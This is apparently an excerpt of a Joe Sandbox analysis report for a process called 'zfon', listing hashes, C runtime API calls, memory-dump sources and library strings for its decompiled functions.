                                                                                                                                                                            • Instruction ID: 4786d21d449e4d6e7cb3810e2625422283ba1130cc3dd1bb0953eca2dd9f7cdc
                                                                                                                                                                            • Opcode Fuzzy Hash: b922828b7e2684afbcf6d79d91bb5d9672ec89368d0f2cf6d04bfcc6100c8038
                                                                                                                                                                            • Instruction Fuzzy Hash: 5FF06966E4A60350FE28B37AA989378A1B2AF44770FC04B34C57D027E5FE2C64868220
                                                                                                                                                                            APIs
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2582267257-0
                                                                                                                                                                            • Opcode ID: 489ec8070939499f2d05b687d8ce4eb02601b61b06c68322a53f6d41bb116b41
                                                                                                                                                                            • Instruction ID: 8c2ad07e8883c2aff2d34148071d3fda7684379efa754eed112a1488ba0dd17a
                                                                                                                                                                            • Opcode Fuzzy Hash: 489ec8070939499f2d05b687d8ce4eb02601b61b06c68322a53f6d41bb116b41
                                                                                                                                                                            • Instruction Fuzzy Hash: B6F01DB6E5A64361ED28F378AA4933891A6AF44770FC00B34D57D057E4FF6C66968220
                                                                                                                                                                            APIs
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Xbad_alloc@std@@$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2582267257-0
                                                                                                                                                                            • Opcode ID: 62d9ba69d16ddf7e9d05fb0b96c0b2a14d2ee61e873a52316fb28099adf97e6b
                                                                                                                                                                            • Instruction ID: 244af2e4585cced92835ab4c12d77424deea6528241af66254d9d4d7196576c2
                                                                                                                                                                            • Opcode Fuzzy Hash: 62d9ba69d16ddf7e9d05fb0b96c0b2a14d2ee61e873a52316fb28099adf97e6b
                                                                                                                                                                            • Instruction Fuzzy Hash: 33F04FA6E4A50352FD38B3B4A949339A1A2AF55771FC04B34C57E056D8BF2C25864320
                                                                                                                                                                            APIs
                                                                                                                                                                            • memchr.VCRUNTIME140 ref: 00007FFBC1B65222
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B652FE
                                                                                                                                                                              • Part of subcall function 00007FFBC1B7CAC4: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FFBC1B3C4D0), ref: 00007FFBC1B7CADE
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B6535B
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B653F7
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                             • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturn$mallocmemchr
                                                                                                                                                                            • String ID: 0123456789-
                                                                                                                                                                            • API String ID: 1035304070-3850129594
                                                                                                                                                                            • Opcode ID: d640ca200c76db91b86670c613c98aecf132a6b1f4fab212538182e6c2e15436
                                                                                                                                                                            • Instruction ID: 681de029673340f561cd65996dbda2eadd61839a64810d3662834ed0f5ebd78b
                                                                                                                                                                            • Opcode Fuzzy Hash: d640ca200c76db91b86670c613c98aecf132a6b1f4fab212538182e6c2e15436
                                                                                                                                                                            • Instruction Fuzzy Hash: E191FE66B08B8689FB04CF75D5403AE23A1EB58BE8F445235DE6E23BD9CE38E055C750
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                             • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abort$CallEncodePointerTranslator
                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                            • API String ID: 2889003569-2084237596
                                                                                                                                                                            • Opcode ID: 38147febd4ea3e6e4a78b6d94c663964a46ac19bb27c7a49567d3dd21f0893b1
                                                                                                                                                                            • Instruction ID: 1922b9a4fb4b0178cbb75b8a589e9d87ee2fdd42a20e284f771b0218d98e3183
                                                                                                                                                                            • Opcode Fuzzy Hash: 38147febd4ea3e6e4a78b6d94c663964a46ac19bb27c7a49567d3dd21f0893b1
                                                                                                                                                                            • Instruction Fuzzy Hash: 1991AFB7A087818AE711CF75E8403AEBBA0FB48788F215129EA4D27759DF38D195CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007378246.00007FFBC1B01000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFBC1B00000, based on PE: true
                                                                                                                                                                             • Associated: 00000006.00000002.2007356448.00007FFBC1B00000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007408551.00007FFBC1B05000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007441500.00007FFBC1B08000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007462693.00007FFBC1B09000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b00000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abort$CallEncodePointerTranslator
                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                            • API String ID: 2889003569-2084237596
                                                                                                                                                                            • Opcode ID: 51865056d64403dec5eec8f15289c0db639756aedb22486eebb00ed42bb3dd8f
                                                                                                                                                                            • Instruction ID: ccc633c1fdb23f590ba9363d0a78f4bb837a2cdbc3aa6eb933016a5caf7a8775
                                                                                                                                                                            • Opcode Fuzzy Hash: 51865056d64403dec5eec8f15289c0db639756aedb22486eebb00ed42bb3dd8f
                                                                                                                                                                            • Instruction Fuzzy Hash: 2191A2F7A08B818AE714DF74E8802AE77A8FB45788F105129EB8D27765DF38D195CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                             • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Name::operator+
                                                                                                                                                                            • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                                                                                                                                            • API String ID: 2943138195-757766384
                                                                                                                                                                            • Opcode ID: 792524ca3cb326ee1ddc7ad9f90e01459882d709a2987deaa3b684760cdbdca5
                                                                                                                                                                            • Instruction ID: ec11c43fe92518a2ecad9f287a34d1f2f8370b4383774028652b83120fa62180
                                                                                                                                                                            • Opcode Fuzzy Hash: 792524ca3cb326ee1ddc7ad9f90e01459882d709a2987deaa3b684760cdbdca5
                                                                                                                                                                            • Instruction Fuzzy Hash: 3A717EF9A0874288E7508F34D8902BE77A5BB09780FA66535DA4D73A69DF3CF165CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            • __except_validate_context_record.LIBVCRUNTIME ref: 00007FFBC1B020F2
                                                                                                                                                                              • Part of subcall function 00007FFBC1B03524: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,00007FFBC1B01222), ref: 00007FFBC1B03564
                                                                                                                                                                            • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B02247
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007378246.00007FFBC1B01000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFBC1B00000, based on PE: true
                                                                                                                                                                             • Associated: 00000006.00000002.2007356448.00007FFBC1B00000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007408551.00007FFBC1B05000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007441500.00007FFBC1B08000.00000004.00000001.01000000.0000000E.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007462693.00007FFBC1B09000.00000002.00000001.01000000.0000000E.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b00000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abort$__except_validate_context_record
                                                                                                                                                                            • String ID: $csm$csm
                                                                                                                                                                            • API String ID: 3000080923-1512788406
                                                                                                                                                                            • Opcode ID: d2e425a725b33c5f85093d2df621a517a4746e4d910d6925cc61b8c9293696ab
                                                                                                                                                                            • Instruction ID: e80a0ddb9c2dd1d8b779358902395218209addf9a2f882ad85c94dfe8b93ee8a
                                                                                                                                                                            • Opcode Fuzzy Hash: d2e425a725b33c5f85093d2df621a517a4746e4d910d6925cc61b8c9293696ab
                                                                                                                                                                            • Instruction Fuzzy Hash: E271D4FA908A818ADB608F75D4C077A77A9FB05B85F04A171DE4C27A99CF3CD495CB00
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                             • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                            • API String ID: 0-1866435925
                                                                                                                                                                            • Opcode ID: 3f2737f50deef84665e9be22b47f0ec4f26eba845b90585ad8b064e2f81e60fc
                                                                                                                                                                            • Instruction ID: d1d32b500ff69f02fd0097ad1944103ce6287b6a117fec03c7b9568425e7703e
                                                                                                                                                                            • Opcode Fuzzy Hash: 3f2737f50deef84665e9be22b47f0ec4f26eba845b90585ad8b064e2f81e60fc
                                                                                                                                                                            • Instruction Fuzzy Hash: 47518076608B8682EB24CF29D4913BAB760FB84F94F049136DA8D57BA5DF3DD845CB00
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                             • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                             • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: abort$CallEncodePointerTranslator
                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                            • API String ID: 2889003569-2084237596
                                                                                                                                                                            APIs
                                                                                                                                                                            • iswctype.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFBC1B37622), ref: 00007FFBC1B38025
                                                                                                                                                                            • iswctype.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFBC1B37622), ref: 00007FFBC1B38039
                                                                                                                                                                            • iswctype.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFBC1B37622), ref: 00007FFBC1B380A5
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: iswctype
                                                                                                                                                                            • String ID: (
                                                                                                                                                                            • API String ID: 304682654-3887548279
                                                                                                                                                                            APIs
                                                                                                                                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFBC1B35B42), ref: 00007FFBC1B36732
                                                                                                                                                                            • isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFBC1B35B42), ref: 00007FFBC1B36743
                                                                                                                                                                            • isxdigit.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFBC1B35B42), ref: 00007FFBC1B3679C
                                                                                                                                                                            • isalnum.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFBC1B35B42), ref: 00007FFBC1B3684C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: isspace$isalnumisxdigit
                                                                                                                                                                            • String ID: (
                                                                                                                                                                            • API String ID: 3355161242-3887548279
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007516333.00007FFBC1B11000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFBC1B10000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007492836.00007FFBC1B10000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007546659.00007FFBC1B23000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007570234.00007FFBC1B28000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007599263.00007FFBC1B29000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b10000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileHeader
                                                                                                                                                                            • String ID: MOC$RCC$csm$csm
                                                                                                                                                                            • API String ID: 104395404-1441736206
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FF79CFD3550: cef_string_map_alloc.LIBCEF(?,?,?,?,00007FF79CFB7544), ref: 00007FF79CFD3554
                                                                                                                                                                            • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@I@Z.MSVCP140 ref: 00007FF79CFBE88A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ??6?$basic_ostream@D@std@@@std@@U?$char_traits@V01@cef_string_map_alloc
                                                                                                                                                                            • String ID: callback_id=$ name=$[CallJsFunctionInUiThread] calling ui thread $c:\projects\hydra\main\code\contrib\contrib\scene\src\source\cef\client_handler_impl.cpp
                                                                                                                                                                            • API String ID: 3922544612-2379361043
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.2007643522.00007FFBC1B30000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007795620.00007FFBC1B82000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007845526.00007FFBC1BBF000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007873683.00007FFBC1BC0000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007899726.00007FFBC1BC1000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC3000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.2007921882.00007FFBC1BC9000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: setlocale$ExceptionThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                            • String ID: bad locale name
                                                                                                                                                                            • API String ID: 1847144839-1405518554
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            • SceneProxy/2.1.0 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36, xrefs: 00007FF79CFB1076
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.1996090327.00007FF79CFB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF79CFB0000, based on PE: true
                                                                                                                                                                            • Associated: 00000006.00000002.1996054187.00007FF79CFB0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996313483.00007FF79D1A5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996761992.00007FF79D211000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996796435.00007FF79D212000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996838539.00007FF79D223000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996867832.00007FF79D225000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            • Associated: 00000006.00000002.1996914836.00007FF79D239000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff79cfb0000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _onexitfreememcpymemmove
                                                                                                                                                                            • String ID: SceneProxy/2.1.0 Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.81 Safari/537.36
                                                                                                                                                                            • API String ID: 3647039986-2186856816
                                                                                                                                                                            • Opcode ID: 0d81267e62ba211395d2598232a8dfab2f01ed8b8c1adb052575867d0b14fb56
                                                                                                                                                                            • Instruction ID: 4cd70f442cff2fffab9644b3e40471c79e877ae990faff108b447d51322238a1
                                                                                                                                                                            • Opcode Fuzzy Hash: 0d81267e62ba211395d2598232a8dfab2f01ed8b8c1adb052575867d0b14fb56
                                                                                                                                                                            • Instruction Fuzzy Hash: 81315E19D1DB8785FB21EB39E941274A372BF58BD4F809235DD8C12266FF7CA1848320
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionThrowstd::ios_base::failure::failure
                                                                                                                                                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                            • API String ID: 2003779279-1866435925
                                                                                                                                                                            • Opcode ID: 76c8ab17d0850bfdcf0f794a817e6ee97031519e73788a0652dc125c2d8a2d96
                                                                                                                                                                            • Instruction ID: b822ea0241b8982f81ec3ba75a13c831f1e53947ac7fc41816fc573ba8c845a0
                                                                                                                                                                            • Opcode Fuzzy Hash: 76c8ab17d0850bfdcf0f794a817e6ee97031519e73788a0652dc125c2d8a2d96
                                                                                                                                                                            • Instruction Fuzzy Hash: 0801F2AAA1860A86FF18CF24D8411EB2361FF94748FE82034D21DA7564EF3CE127CB51
                                                                                                                                                                            APIs
                                                                                                                                                                            • strcspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFBC1B42D92
                                                                                                                                                                            • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFBC1B42DA5
                                                                                                                                                                            • strcspn.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFBC1B42DBA
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B43110
                                                                                                                                                                            • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFBC1B4315B
                                                                                                                                                                              • Part of subcall function 00007FFBC1B480D8: memmove.VCRUNTIME140(?,?,?,?,00000000,00007FFBC1B45912), ref: 00007FFBC1B48130
                                                                                                                                                                              • Part of subcall function 00007FFBC1B480D8: memset.VCRUNTIME140(?,?,?,?,00000000,00007FFBC1B45912), ref: 00007FFBC1B4813F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.2007670403.00007FFBC1B31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBC1B30000, based on PE: true
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ffbc1b30000_zfon.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _invalid_parameter_noinfo_noreturnstrcspn$localeconvmemmovememset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2282448879-0
                                                                                                                                                                            • Opcode ID: 43ba8dbb3fa5cec9301f72fa23c6b9e93b59b68c625457b30bad576e0c72c2b3
                                                                                                                                                                            • Instruction ID: 2f3f15468059e4a95d2d39c1ddd49cfabecf1a4e03e8a93e8b0408f5f84637f1
                                                                                                                                                                            • Opcode Fuzzy Hash: 43ba8dbb3fa5cec9301f72fa23c6b9e93b59b68c625457b30bad576e0c72c2b3
                                                                                                                                                                            • Instruction Fuzzy Hash: 01E1C36AB18A8686FB018F79D4402AE2371BF48B98F54A231DE5D377A5DF3CD44AD700
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2470: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF79CFB22DB), ref: 00007FF79CFB24CB
                                                                                                                                                                              • Part of subcall function 00007FF79CFB2470: memcpy.VCRUNTIME140(?,?,?,00007FF79CFB22DB), ref: 00007FF79CFB24E2
